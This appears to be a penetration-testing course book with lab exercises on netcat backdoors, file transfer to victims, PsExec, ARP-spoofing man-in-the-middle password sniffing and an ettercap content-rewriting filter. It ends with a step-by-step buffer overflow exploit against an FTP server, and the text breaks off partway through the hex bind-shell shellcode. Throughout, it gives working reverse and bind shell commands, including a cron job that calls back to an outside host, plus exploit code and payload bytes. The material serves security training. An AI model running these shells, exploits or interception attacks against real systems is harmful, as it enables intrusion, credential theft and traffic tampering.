Book:Penetration

NetCat (NC) is a network tool able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it’s essential that you understand the capabilities of NetCat. NetCat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too. It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me.

A port scanning example command line from Hobbit is nc -v -w 2 -z target 20-30. Netcat will try connecting to every port between 20 and 30 (inclusive) at the target, and will inform you about an FTP server, telnet server, and mailer along the way.

The –z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on.

To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanning it isn’t its strength.

The following is a command line example for scanning ports 1-200 on 192.168.1.67.

Command line: nc –v –w2 –z <target ip> <port range>

We can see that ports 139, 135, 80 and 25, 21 are open.

Due to NetCat's simplicity, it can also function as a banner grabber. For example, if we now want to enumerate 192.168.1.67, we can attempt to read the port banners, and make a guess at the underlying OS. We will attempt to grab the banners from port 21, 25 and 80.

Command line: nc –nv <target ip> <port>

We identify (what appears to be) IIS 5.0 on port 80, and ESMTP Mail service version 5.0, which suggests this is Windows 2000.

NetCat can act as a basic backdoor on a compromised system.

For this, we need NetCat on both our attacking computer and victim computer (Client / Server relationship). It doesn't really matter how we got nc.exe on the Victim Server, after all this is a NetCat overview…

Command line (on the victim computer): nc.exe -lvvp 10001 -d -e cmd.exe

Here's what that command does:

nc tells Windows to run the nc.exe file with the following arguments:

-l tells netcat to listen on the specified port number

-p specifies a port to listen for a connection on

-d tells NetCat to detach from the process we want it to run.

-e tells what program to run once the port is connected to (cmd.exe)

Once this command is issued on the Victim Server, we can attempt to connect to it on port 10001, using netcat as our client. The following screenshot illustrates the shell we obtained by connecting to port 10001.

Command line (on the attacking computer): nc.exe -nv <target ip> <port>

NetCat can also "send" a shell to another instance of a listening NetCat session.

This is especially useful if the attacked machine is behind a firewall or otherwise NATed.

On our attacking computer, we set netcat to listen on port 443 (for example):

Command line (on the attacking computer): nc.exe –lvp <port>

While on the attacking machine, we instruct netcat to send a shell to the attackers IP and specified port…

Command line (on the victim computer): nc.exe –nv <ip> <port> -d –e cmd.exe

Once the command is executed, we immediately see the victim computers' command prompt appear:

Another example :

Try this on Linux :

On the first console, enter:

$ nc -l -p 5600 -e /bin/bash

and at the second console:

$ nc 10.0.1.1. 5600

Now it is as if we are connected to the first machine and typing at the shell. We can see every output of our command and do whatever we want with the server machine. We are connected to it as the root user. This is admittedly very scary and a bit unwise.

Another example:

At the WORK computer, we'll set up a cron job to start at 22:01. Just as in the telnet example it connects to myhome.dyndns.org (our dynamic DNS address) and starts bash.

And at home just at 22:00 or so we start:

$ nc -vv -l -p 80

to begin listening on port 80 for incoming connections.

At 22:01, WORK connects to HOME, starts bash and says 'Master!' Bingo. We are connected to WORK (or vice versa), and WORK is ready to operate any command we want.

We can try this at our virtual network (lo:1 and lo:2). To start the client listening for a connection:

$ nc -vv -l -p 80

To make a connection from the server:

$ nc 10.0.1.1 80 -e /bin/bash

It is very simple and efficient, because we only use outgoing port 80, the most widely used port because it is used for web access.

Let's look at other possibilities NetCat can provide. Say we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don't want to (or can't) TFTP the file. We can use Netcat to transfer files from one system to another. To receive a file named hack.txt on the destination system start NetCat on the Victim server with the following command:

Command line (on the victim computer): nc –l –p 1234 >hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the Victim machine with the following command:

Command line (on the attacking computer): nc –nv destination 1234 <hack.txt

Issue a ^C on the source system and your done. Be sure to check the file to be sure it is the same size as the original.

Another example:

At the server console:

$ nc -v -w 30 -p 5600 l- > filename.back

and on the client side:

$ nc -v -w 2 10.0.1.1 5600 < filename

Magically, the file named “filename” is transferred from the client to the server. You can check that they are identical.

The command line uses the new argument -w to cause Netcat to wait for a few seconds. We made that longer in the server side because it is most affected by a pause. Another important point is the > and < redirection commands, with which Unix users are very familiar.

In the server we said > filename.back. Any output will be directed to this file. As it happens, the output is the file filename which is send by the client. Think of this as a pipeline. We take a bucket (file), for the contents to the pipeline (Netcat's port), and, at the other end we fill another bucket from the pipeline.

You can use netcat as a simplistic honeypot, where NetCat listens on a port, and displays the traffic arriving at that port. You can even "emulate" basic banners, as shown in the following example – which demonstrates an IIS file traversal attack capture on port 80:

NetCat can also be used to execute files on a remote machine. This can be done by passing commands to the remote cmd.exe.

Command line (on the victim computer): nc –lvp 3324 -e cmd

We can then execute commands (or even a batch file) by piping the command into the remote netcat shell:

Command line (on the attacking computer): type command.bat | nc -w 3 <target ip> <port>

In this example, calc.exe is executed on the victim system, as shown in the next screenshot:

Duration: 25 mins

Goals:

Solution: To be demonstrated by Instructor

Pemote Procedure Call (RPC) is a protocol that allows a computer program running on one host to cause code to be executed on another host without the programmer needing to explicitly code for this. When the code in question is written using object-oriented principles, RPC is sometimes referred to as remote invocation or remote method invocation.

PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally. You can download PsExec for free from the Sysinternals Web site (http://www.sysinternals.com/)

C:\tools>psexec 
PsExec v1.61 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.

Usage: psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s]
[- s|-e][-i][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
    -a         Separate processors on which the application can run with
               commas where 1 is the lowest numbered CPU. For example,
               to run the application on CPU 2 and CPU 4, enter:
               "-a 2,4"
    -c         Copy the specified program to the remote system for
               execution. If you omit this option the application
               must be in the system path on the remote system.
    -d         Don't wait for process to terminate (non-interactive).
    -e         Loads the specified account's profile.
    -f         Copy the specified program even if the file already
               exists on the remote system.
    -i         Run the program so that it interacts with the desktop on the
               remote system.
    -n         Specifies timeout in seconds connecting to remote computers.
    -p         Specifies optional password for user name. If you omit this
               you will be prompted to enter a hidden password.
    -s         Run the remote process in the System account.
    -u         Specifies optional user name for login to remote
               computer.
    -v         Copy the specified file only if it has a higher version number
               or is newer on than the one on the remote system.
    -w         Set the working directory of the process (relative to
               remote computer).
    -priority  Specifies -low, -belownormal, -abovenormal, -high or
               -realtime to run the process at a different priority.
    computer   Direct PsExec to run the application on the remote
               computer or computers specified. If you omit the computer
               name PsExec runs the application on the local system,
               and if you specify a wildcard (\\*), PsExec runs the
               command on all computers in the current domain.
    @file      PsExec will execute the command on each of the computers listed
               in the file.
    program    Name of application to execute.
    arguments  Arguments to pass (note that file paths must be
               absolute paths on the target system).

You can enclose applications that have spaces in their name with
quotation marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter
key, and typing Ctrl-C terminates the remote process.

If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name
in the Domain\User syntax if the remote process requires access
to network resources or to run in a different account. Note that
the password is transmitted in clear text to the remote system. 

Error codes returned by PsExec are specific to the applications you
execute, not PsExec.


C:\tools>

PsExec's ability to run processes remotely with no manual installation of software on the remote system makes deployment easy. However, if PsExec were only able to launch a program on a remote system, its usefulness would be limited. PsExec's ability to redirect the input and output of console applications is what makes the tool a versatile systems management utility.

For example, PsExec lets Ipconfig, the Windows utility that displays the TCP/IP configuration for a system's network adapters, show a remote system's configuration. A sample command for that use is

psexec \\<remote ip> ipconfig

where remote is the name or IP address of the system you want to query. You'll see Ipconfig's output as if you had run Ipconfig on the local machine.

If you don't specify the path of the program you want to execute, PsExec looks in the \windows\system32 directory of the remote system. If you know that the program isn't in that directory, enter its full path on the remote system; if it's an executable on the local system that you want to execute on the remote system, specify the -c switch and the file's local path. The -c switch directs PsExec to copy the specified executable to the remote system for execution and delete the executable from the remote system when the program has finished running.

An even more powerful use of PsExec's console-redirection capability is to run a command prompt on a remote system as if the command prompt were running locally. This use of PsExec is similar to running a Telnet client on the local machine and connecting to a Telnet service on the remote machine, but you don't need to have the Telnet service, or any other special service, running on the remote system. Simply execute the command:

psexec \\<remote ip> command

For example, the command

psexec \\<remote ip> cmd /c ver

displays the Windows version number of the remote system on the local machine's console.

Another popular use of PsExec is to deploy hotfixes or other patches that support a noninteractive interface across your network. To make this task even easier, PsExec takes multiple computer names, the name of a text file containing a list of computer names, or the special name of \\* that results in an enumeration of all the computers in the current domain. For instance, to execute the Microsoft MyDoom removal tool on computers named Remote and Remote1 and log the exit status of the cleanup to a file, you could use the command

psexec \\remote,remote1 -c trojan.exe -s 2> results.log

Upon exit, a process specifies an integer that the process's parent process can read. Programs often use the exit code to report the success or failure of their execution. Whenever a process executed with PsExec is completed, PsExec displays the process's exit code and returns the exit code as its own exit code. You should test a program's behavior or check its documentation to determine what that program's specific error codes mean, but an exit code of 0 typically means success. The -s switch specifies that PsExec should execute the command under the System account. I'll discuss this option more in a moment.

Duration: 25 mins

Goals:

Solution: To be demonstrated by Instructor

DameWare NT Utilities is an enterprise system management tool for Windows NT/2000/XP, providing an integrated collection of Microsoft Windows NT/2000 administration utilities. The software has all the most frequently used Windows NT/2000 administration tools in one programme and incorporates a centralised interface for remote management of Windows NT/2000 Server and Workstation machines.

VNC has a wide range of applications including system administration, IT support and helpdesks. It can also be used to support the mobile user, both for hot desking within the enterprise and also to provide remote access at home, or on the road. The system allows several connections to the same desktop, providing an invaluable tool for collaborative or shared working in the workplace or classroom. Computer support within the geographically spread family is an ever popular use.

• VNC Server Settings

• VNC Client

• VNC Http client

Remote Administrator (Radmin) is a secure remote control software that enables you to work on a remote computer as if you were sitting in front of it. This program is the ideal remote access solution. You can access the same computer from multiple places and use advanced file transfer, remote shutdown, Telnet, OS-integrated NT security system support and other features

Now that we have remote access to a machine, how can we transfer our files to the victim ?

We can use the default TFTP client found on windows. This would require of us to set up a TFTP server, in order to serve our malicious files to the victim.

d:\tools>tftp -i 192.168.1.152 get nc.exe
Transfer successful: 59392 bytes in 1 second, 59392 bytes/s

d:\tools>dir nc.exe
 Volume in drive D has no label.
 Volume Serial Number is 189A-E380

Directory of d:\tools

09/29/2005  12:49 PM            59,392 nc.exe
               1 File(s)         59,392 bytes
               0 Dir(s)  20,785,954,816 bytes free

d:\tools>

We can use the default FTP client found on windows. This would require of us to set up an FTP server, in order to serve our malicious files to the victim. However, there's a small glitch with this method, as we will soon see.

Try the establishing an FTP session from your command prompt:

d:\tools>ftp ftp.netvision.net.il
Connected to ftp.netvision.net.il.
220 ftp.netvision.net.il FTP server ready
User (ftp.netvision.net.il:(none)): anonymous
331 Anonymous login ok, send your complete email address as your password.
Password: test@test.com
230 Anonymous access granted, restrictions apply.
ftp> bye
221 Goodbye.

d:\tools>

This should work as expected, no suprises.

Try the same, using a *remote* shell, (one that has obtained via netcat, or a remote exploit). Does ftp work ?

This is one example which can be used for FTP file transfers. Notice how each command is non interactive, ie, it does not require further user input.

d:\tools>echo open 192.168.1.152 21 >ftp.txt

d:\tools>echo evil >> ftp.txt

d:\tools>echo attacker >> ftp.txt

d:\tools>echo bin >> ftp.txt

d:\tools>echo get nc.exe >> ftp.txt

d:\tools>echo bye >> ftp.txt

d:\tools>ftp -s:ftp.txt
ftp> open 192.168.1.152 21
Connected to 192.168.1.152.
220-GuildFTPd FTP Server (c) 1997-2002
220-Version 0.999.13
220 Please enter your name:
User (192.168.1.152:(none)):
331 User name okay, Need password.
230 User logged in.
ftp> bin
200 Type set to I.
ftp> get nc.exe
200 PORT command successful.
150 Opening binary mode data connection for /nc.exe (61440 bytes).
226 Transfer complete. 61440 bytes in 0 sec. (0.00 Kb/s).
ftp: 61440 bytes received in 0.02Seconds 3072.00Kbytes/sec.
ftp> bye
221 Goodbye.  Control connection closed.

d:\tools>dir nc.exe
Volume in drive D has no label.
Volume Serial Number is 189A-E380

Directory of d:\tools

09/29/2005  01:23 PM            61,440 nc.exe
               1 File(s)         61,440 bytes
               0 Dir(s)  19,291,262,976 bytes free

d:\tools>

Another devious way of geting files over to the victim is by using Inline file transfer.

The 2 previous methods involved opening external connections (FTP / TFTP) from the victim machine. The Inline Transfer method transfers the file *within* the same session as the shell.

A good example to show would be the Windows "debug" command. Imagine that after obtaining a shell, we would "write" a file (using echo commands) and then compile it using debug.

No doubt that "writing" a file in hex, from command line, might be a daunting task... Specialised tools have been made (such as exe2bat) to automate the dissasembly of a file, and turn it to a list of echo commands.

C:\tools>exe2bat.exe nc.exe nc.bat
||exe2batch||

Usage : exe2bat.exe inputfile outputfile
e.g.  : exe2bat.exe dcmd.exe command.txt

Finished: nc.exe > nc.bat

C:\tools>

Check the Output (http://www.hackingdefined.com/downloads/ncbat.rar) file.

Packet sniffers (also known as Network Analyzers or Ethernet Sniffers) are software programs which can see and/or log traffic passing over a network or part of a network. As data streams travel back and forth over the network, the program captures each packet and eventually decodes and analyzes its content according to the appropriate RFC or other specifications.

Depending on the network structure (hub or switch) one can sniff all or only parts of the traffic from a single machine within the network; however, there are some methods to avoid traffic narrowing by switches to gain access to traffic from other systems on the network (e.g. One of them is ARP spoofing).

For network monitoring purposes it may also be desirable to monitor all data packets in a LAN which can be done using a network switch with a so-called monitoring port (it mirrors all packets passing through all ports of the switch).

Ethereal is a protocol analyzer, or "packet sniffer" software, used for network troubleshooting, analysis, software / protocol development, and education. It has all of the standard features of a protocol analyzer.

The functionality Ethereal provides is very similar to tcpdump (c.f.), but it adds a GUI frontend, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network card into promiscuous mode.

Ethereal is released under an open source license, and it runs on most Unix and Unix-compatible systems, including Linux, Solaris, FreeBSD, NetBSD, OpenBSD, and Mac OS X, and also on Microsoft Windows.

Getting a thourough understanding of a packet sniffer is vital for both hacker and administrator. Generally, it does not matter what sniffer you use, as long as you know how to use it well.

Duration: 20 mins

PreRequisites: http://www.hackingdefined.com/downloads/dump1.cap

Goals:

Solution: To be demonstrated by Instructor

Tcpdump prints out the headers of packets on a network interface that match the boolean expression. It can also be run with the -w flag, which causes it to save the packet data to a file for later analysis, and/or with the -b flag, which causes it to read from a saved packet file rather than to read packets from a network interface.

In all cases, only packets that match expression will be pro­cessed by tcpdump.

CommView is a powerful network monitor and analyzer designed for LAN administrators, security professionals, network programmers, home users…virtually anyone who wants a full picture of the traffic flowing through a PC or LAN segment.

Editing packets manually can be useful in several situations...

Duration: 20 mins

PreRequisites: Instructor Demo

Goals:

Solution: To be demonstrated by Instructor

ARP Spoofing is essentially a simple attack, where an attacker sends Spoofed ARP responses to a victim computer. The unsuspecting victim computer happily accepts the forged ARP replies and adds it to its ARP cache. At this stage, where the victim's ARP cache is "Poisoned", traffic redirection can take place, due to the fact that IP to ARP resolution is first checked in the ARP cache.

Remember the NMAP IP Spoofing Option ? By combining NMAP with ARP spoofing, we can poison our victim computers' ARP Cache into thinking that 192.168.1.222 is us, thereby receiving the sent packets with the spoofed address:

The result of arpspoof can be seen when giving the command arp –a on the victim machine

This time, due to the fact that we've poisoned the arp cache on the victim machine, we *do* get the scan replies, while the IDS logs a nonexistent IP address (192.168.1.222).

Command line: nmap -sS -P0 -e eth0 -S <fake source ip address> <target ip address>

The output from the IDS clearly shows that the *real* source IP address is not revealed:

This attack will only work on a local lan, as ARP (by design) is non routable.

Suppose you wanted to sniff a computers' traffic (on a switched LAN) for passwords. Using a tool such as ARPSpoof, you can spoof your attacking computer IP address to be a "default gateway", thus performing a "Man In The Middle" attack. For such attacks, IP forwarding must be enabled on your computer to enable proper communication between computers.

Imagine the following scenario:

(MAC addresses have been shortened for brevity)

The attacker would poison both the Victim and Router, creating the following effect:

In order that we grasp the fundamentals of ARP Spoofing, we'll start with a "manual" attack on a victim computer. We will be using the tools ARPSpoof and Dsniff.

Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

dsniff (the tool, not the package)is a simple password sniffer. It handles FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, and Oracle SQL*Net auth info.

Dsniff goes beyond most sniffers in that it minimally parses each application protocol, only saving the "interesting" bits. (passwords)

For more information about the Dsniff package, check out http://www.datanerds.net/~mike/dsniff.html

Don't forget to enable IP forwarding on your attacking host so that the traffic goes through your host. Otherwise victim will loose connectivity.

To enable IP forwarding temporarily (until the next reboot):

echo 1 > /proc/sys/net/ipv4/ip_forward

To enable permanently, edit /etc/sysconfig/network and change or add the following line:

FORWARD_IPV4 = YES

Arpspoof is a tool used to fool a computer into belive that the mac address it is talking has changed. When run it floods the victim with fake ARP replies to force the victim computer to change it´s ip-mac address association. When this works, the victim computer changes it mac address entry to the attacker mac, and all the traffic is redirected to the attacker.

Lets test this out. In the following scenario, we will intercept traffic going (to and from) from the victim machine (192.168.1.151), to the default gateway (192.168.1.138).

1. We ping the victim and the gateway in order to populate the ARP Cache with valid responses.

2. We start the attack, poisoning the victim's ARP Cache with our MAC address:

Command line: arpspoof -t <victim address> <gateway address>

3. In a separate prompt we poison the gateway's address:

4. Assuming we have Enabled IP forwarding on our machine, we are now redirecting traffic from the attacked machine to our machine, and onwards to the default gateway. This is what the victim's ARP cache looks like before and after the attack:

Before:

After:

Now we can watch all the traffic between the victim host and the outside network going through the attacking machine via any Network Analyzer (such as Dsniff).

All passwords being transmitted from the victim host to the gateway (and on to the internet) will pass via your attacking machine, and can be sniffed.

Once you control the victim's traffic, you can experiment with countless "Man in the Middle" attacks, including SMB and Kerberos sniffing and cracking, Traffic manipulation, etc.

Duration: 25 mins

PreRequisites: Instructor Demo

Goals:

Solution: To be demonstrated by Instructor

Automated tools for MITM attacks make them easy to implement. We will look at Cain and Able (Win32) and Ettercap (*nix).

Cain & Abel allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary & Brute-Force attacks, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

It also has ARP poisoning and spoofing capabilities, making it an extremely powerful hacking or auditing tool.

Check out The Cain and Abel Demo (http://www.hackingdefined.com/downloads/apr-intro.swf), and the Online Manual (http://www.oxid.it/ca_um/).

We discover the computers in the subnet by MAC address scanning:

We then choose the Victim and Target machines:

And happily collect our passwords:

The simplicity of this tool is unnerving.

Experiment with the DNS spoofing features of Cain and Abel. How does this work?

Experiment with the HTTPS features of Cain and Abel. How does this work?

Duration: 15 mins

PreRequisites: Instructor Demo

Goals:

Solution: To be demonstrated by Instructor

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.

Don't forget to enable IP forwarding...

#echo 1 > /proc/sys/net/ipv4/ip_forward

• Sniff -> Unified Sniffing

• Hosts -> Scan for Hosts

• Hosts -> Hosts List

• Add victim to "Target 1" and Destination to "Target 2".

• MITM -> ARP Poisoning (Sniff Remote Connections)

• Start -> Start Sniffing

We start by creating our own filter:

############################################################################
#                                                                          #
#  ettercap -- muts.filter --                                              #
#                                                                          #
############################################################################

##
#  This filter will substitute the word 'hired' with 'fired' in http traffic
#  and will log the content of the packet in /tmp/fired.users.http.log
## 

if (ip.proto == TCP && tcp.src == 80)  {
    log(DATA.data, "/tmp/fired.users.http.log");
    replace("hired", "fired");
    msg("User Fired!.\n");
}

When ready, we compile it using etterfilter:

root# etterfilter muts.filter -o muts.ef

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
       DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
       VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'muts.filter'  done.
Unfolding the meta-tree  done.
Converting labels to real offsets  done.
Writing output to 'muts.ef'  done.
-> Script encoded into 7 instructions.
root#

We then run Ettercap, with the new filter (I preffer to do this in command line )

root# ettercap -T -q -F muts.ef -M ARP /192.168.1.151/ // output:

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from muts.ef...
Listening on eth0... (Ethernet)

  eth0 ->       00:06:1B:CC:00:FA     192.168.1.172     255.255.255.0 

Privileges dropped to UID 65534 GID 65534...

 28 plugins
 39 protocol dissectors
 53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

6 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.151 00:50:FC:F6:74:C8

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

User Fired!.
User Fired!.

We can see that our script was executed. Lets look at our log file:

root@slax:~# cat /tmp/fired.users.http.log
HTTP/1.1 200 OK
Date: Tue, 27 Sep 2005 10:36:56 GMT
Server: Apache/2.0.54 (Gentoo/Linux) PHP/4.4.0
Last-Modified: Tue, 27 Sep 2005 10:34:27 GMT
ETag: "5a704-31-6b9232c0"
Accept-Ranges: bytes
Content-Length: 49
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

Hi muts, 


You are hired.


The Boss.

The original word "hired" was substituted to "fired", as we can see in the victims' browser.

From the Ettercap MAN Page:

TARGET SPECIFICATION
There is no concept of SOURCE nor DEST. The two targets are intended to
filter traffic coming from one to the other and vice-versa (since the
connection is bidirectional).

TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of
its parts and this will represent an ANY in that part.
e.g.
"//80" means ANY mac address, ANY ip and ONLY port 80
"/10.0.0.1/" means ANY mac address, ONLY ip 10.0.0.1 and ANY port

MAC must be unique and in the form 00:11:22:33:44:55

IPs is a range of IP in dotted notation. You can specify range with the
- (hyphen) and single ip with , (comma). You can also use ; (semicolon)
to indicate different ip addresses.
e.g.
"10.0.0.1-5;10.0.1.33" expands into ip 10.0.0.1, 2, 3, 4, 5 and
10.0.1.33

PORTs is a range of PORTS. You can specify range with the - (hyphen)
and single port with , (comma). e.g.
"20-25,80,110" expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

NOTE:
you can reverse the matching of the TARGET by adding the -R option to
the command line. So if you want to sniff ALL the traffic BUT the one
coming or going to 10.0.0.1 you can specify "./ettercap -R /10.0.0.1/" 

NOTE:
TARGETs are also responsible of the initial scan of the lan. You can
use them to restrict the scan to only a subset of the hosts in the net-
mask. The result of the merging between the two targets will be
scanned. remember that not specifying a target means "no target", but
specifying "//" means "all the hosts in the subnet.

Duration: 15 mins

PreRequisites: Instructor Demo

Goals:

Solution: To be demonstrated by Instructor

A vulnerability was reported in the Ability Server in the FTP service. A remote authenticated user can execute arbitrary code on the target system. K-Otik posted an exploit by muts from whitehat.co.il that indicates that there is a buffer overflow in the processing of the FTP STOR command.

Impact: A remote authenticated user may be able to execute arbitrary code on the target system with the privileges of the FTP service.

If you are running another FTP service (such as Microsoft FTP server), make sure you disable it, or change the server port.

Set up and test ability server manually by trying to log on with a valid username and password.

I recommend making shortcuts to both ability server and ollydebug on the desktop, for easy access.

Test the server for a successful logon, with the username and password set in the previous step (default ftp:ftp).

1. Copy and modify the following template (written in python). This script will log into the ftp server, and send 1300 A's together with the STOR command.

import ftplib
from ftplib import FTP
 
buffer = '\x41'*1600
try:
   # Edit the IP, Username and Password.
   ftp = FTP('127.0.0.1') 
   ftp.login('ftp','ftp')
   print "\nEvil Buffer sent..."
except:
   print "\nCould not Connect to FTP Server."
try:
   ftp.transfercmd("STOR " + buffer)   
except:
   print "\nDone."

Once the script is run, Ability Server should crash.

2. Restart Ability server, and Ollydebug.

3. Attach to the ability server process using ollydebug (don't forget to press F9 to release the process).

4. Run the script again, and you should see olly catch the exception. Examine the top right registers carefully.

We see 2 interesting things:

• EIP has been completely overwritten with our user input.
• ESP points to our User Input.

Now we need to find out which 4 bytes of the 1300 are the ones that overwite our EIP. We want to know this, as EIP is responsible for the program execution flow. EIP points to where the program is meant to return to, after ending the current function.

This means that by correctly manipulation the EIP, we can point the program to go to an unintened area in the memory space, and execute code to our choice.

We can find out exactly which bytes overwrite the EIP by playing a game...

If i were to ask you to guess a number i thought of, between 1 and 100, our conversation would be similar to this (assuming the number chosen was 73):

student > 50
mati    > Bigger
student > 75
mati    > Smaller
student > 65
mati    > Bigger
student > 70
mati    > Bigger
student > 73
mati    > Correct!

In the same manner, we can find out where the EIP is overwritten. We'll send out 650 A's and 650B's (instead of 1300 A's), and see if the EIP is overwritten by A's or B's.

If for example, the EIP is now overwritten by B's, we know the overwrite is in between the 650th byte and the 1300th byte.

We'll continue this procees by sending out 650 A's, 325B's and 325 C's (instead of 650 A's and 650B's), and checking what characters overwrite the EIP...

Please note that there are other much quicker ways of finding out where the EIP has been overwritten, however using this method better explains the process.

You should come close to the following values:

buffer = '\x41'*965+'\x42'*3+'\x43'*3+'\x44'*3+'\x44'*3+'\x46'*300

Once this buffer is sent, olly shows the following output:

It seems EIP is overwritten exactly after 966 bytes. Please note that you may get different results. I've seen situations where its takes 970 (local exploitation).

Lets look deeper into this crash. Clicking on the ESP register --- > follow in dump shows the following:

• You'll notice that ESP points to out overwritten "F"'s. Approximately 16 bytes before before that, our EIP is overwritten.

• We can "bridge" those 16 bytes, by overwriting them with "nop"s (no-operation command). A NOP as the value "\x90".

• If you check how many "F"'s hare present in the memory, you'll be able to roughly calculate how much space we have for our own command, also known as shellcode.

Using all of this information, we can conculde that we want our exploit to look similar to this:

After we've understood the inner workings of how our exploit should be constructed, we need to find a way to get EIP to point to the beginning of our shellcode.

ESP points (roughly) to the beginning of our shellcode, so if we can preform a JMP ESP command, we should be ok. How do we do this ?

What we need to do in this case, is look for the JMP ESP command in one of the systems' core dll's, such as kernel32.dll. or ntdll.dll. If we find a JMP ESP command inside the memory space of one of these dll's we can point our EIP to that memory space, thus executing our JMP ESP command. Once this command is executed, we should be at the beginning of our shellcode.

We can use the findjump2 tool for finding JMP ESP in core dll's:

C:\>findjmp2 user32.dll esp

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning user32.dll for code useable with the esp register
0x77E14C29      jmp esp
0x77E3C256      jmp esp
0x77E56F43      push esp - ret
Finished Scanning user32.dll for code useable with the esp register
Found 3 usable addresses

C:\>

We can see that several "jmp esp" commands have been found in user32.dll. We'll use the first one, and overwrite the EIP with this address. Our new buffer should look like this (note that the Adress is entered in backwards, due to the litle endian architecture):

buffer = '\x41'*966+'\x29\x4c\xe1\x77'+'\x90'*16+sc

Writing custom shellcode is not in the scope of this course. For a beginners tutorial, try http://www.acm.uiuc.edu/sigmil/talks/shellcode/shellcode.html.

For our example, we will be using "Ready Made" shellcode, which can be found on the metasploit site: http://metasploit.com:55555/PAYLOADS.

We choose a standard bindshell on port 4444 to use with our example.

/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 http://metasploit.com/ */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x28"
"\x8c\x7f\x4e\x83\xeb\xfc\xe2\xf4\xd4\xe6\x94\x03\xc0\x75\x80\xb1"
"\xd7\xec\xf4\x22\x0c\xa8\xf4\x0b\x14\x07\x03\x4b\x50\x8d\x90\xc5"
"\x67\x94\xf4\x11\x08\x8d\x94\x07\xa3\xb8\xf4\x4f\xc6\xbd\xbf\xd7"
"\x84\x08\xbf\x3a\x2f\x4d\xb5\x43\x29\x4e\x94\xba\x13\xd8\x5b\x66"
"\x5d\x69\xf4\x11\x0c\x8d\x94\x28\xa3\x80\x34\xc5\x77\x90\x7e\xa5"
"\x2b\xa0\xf4\xc7\x44\xa8\x63\x2f\xeb\xbd\xa4\x2a\xa3\xcf\x4f\xc5"
"\x68\x80\xf4\x3e\x34\x21\xf4\x0e\x20\xd2\x17\xc0\x66\x82\x93\x1e"
"\xd7\x5a\x19\x1d\x4e\xe4\x4c\x7c\x40\xfb\x0c\x7c\x77\xd8\x80\x9e"
"\x40\x47\x92\xb2\x13\xdc\x80\x98\x77\x05\x9a\x28\xa9\x61\x77\x4c"
"\x7d\xe6\x7d\xb1\xf8\xe4\xa6\x47\xdd\x21\x28\xb1\xfe\xdf\x2c\x1d"
"\x7b\xdf\x3c\x1d\x6b\xdf\x80\x9e\x4e\xe4\x6e\x12\x4e\xdf\xf6\xaf"
"\xbd\xe4\xdb\x54\x58\x4b\x28\xb1\xfe\xe6\x6f\x1f\x7d\x73\xaf\x26"
"\x8c\x21\x51\xa7\x7f\x73\xa9\x1d\x7d\x73\xaf\x26\xcd\xc5\xf9\x07"
"\x7f\x73\xa9\x1e\x7c\xd8\x2a\xb1\xf8\x1f\x17\xa9\x51\x4a\x06\x19"
"\xd7\x5a\x2a\xb1\xf8\xea\x15\x2a\x4e\xe4\x1c\x23\xa1\x69\x15\x1e"
"\x71\xa5\xb3\xc7\xcf\xe6\x3b\xc7\xca\xbd\xbf\xbd\x82\x72\x3d\x63"
"\xd6\xce\x53\xdd\xa5\xf6\x47\xe5\x83\x27\x17\x3c\xd6\x3f\x69\xb1"
"\x5d\xc8\x80\x98\x73\xdb\x2d\x1f\x79\xdd\x15\x4f\x79\xdd\x2a\x1f"
"\xd7\x5c\x17\xe3\xf1\x89\xb1\x1d\xd7\x5a\x15\xb1\xd7\xbb\x80\x9e"
